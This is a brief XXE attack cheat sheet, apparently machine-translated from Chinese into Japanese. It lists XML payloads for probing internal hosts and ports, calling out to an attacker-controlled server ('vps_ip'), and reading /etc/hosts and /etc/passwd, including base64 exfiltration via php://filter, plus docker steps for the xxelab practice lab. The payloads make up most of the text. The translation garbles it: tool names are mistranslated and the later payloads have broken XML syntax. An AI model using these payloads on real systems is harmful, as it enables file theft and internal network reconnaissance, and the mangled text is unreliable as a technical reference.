外部DTDファイルへのアクセス内部ホスト/ポートを参照します。
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)
外部DTDファイルアクセスワイネットワークを参照します。
<!DOCTYPE a SYSTEM "http://vps_ip" >
内部基準エンティティ。
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
外部エンティティは、ローカルファイルを読み取ります。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
王ホストポートへのアクセス、内部および外部エンティティ。
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)
外部エンティティは、ワイネットワークにアクセスすることができます。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
ドッキングウィンドウのダウンロードrrodrigo / xxelabミラー
開始:ドッキングウィンドウの実行-d -p 8082:80 rrodrigo / xxelab
登録福袋は、使用のxml形式の転送、およびメールボックスが戻ってきたことがわかりました。
読み取りXXE / etc / passwdファイルを設定するためのリターンエコーの内容
<?xml version = "1.0"エンコード= "UTF-8"?>
<!DOCTYPEのC [
<!ENTITYファイルシステム"/ etc / passwdファイル">
]>
base64エンコードのXXEを使用して、リターンパッケージの検証を防ぎます
<?xml version = "1.0"エンコード= "UTF-8"?>
<DOCTYPEのC [!
<ENTITYファイルSYSTEM "PHP://filter/read=convert.base64-encode/resource=/etc/passwd"!>
]>
リターンパケットをbase64、base64でデコード
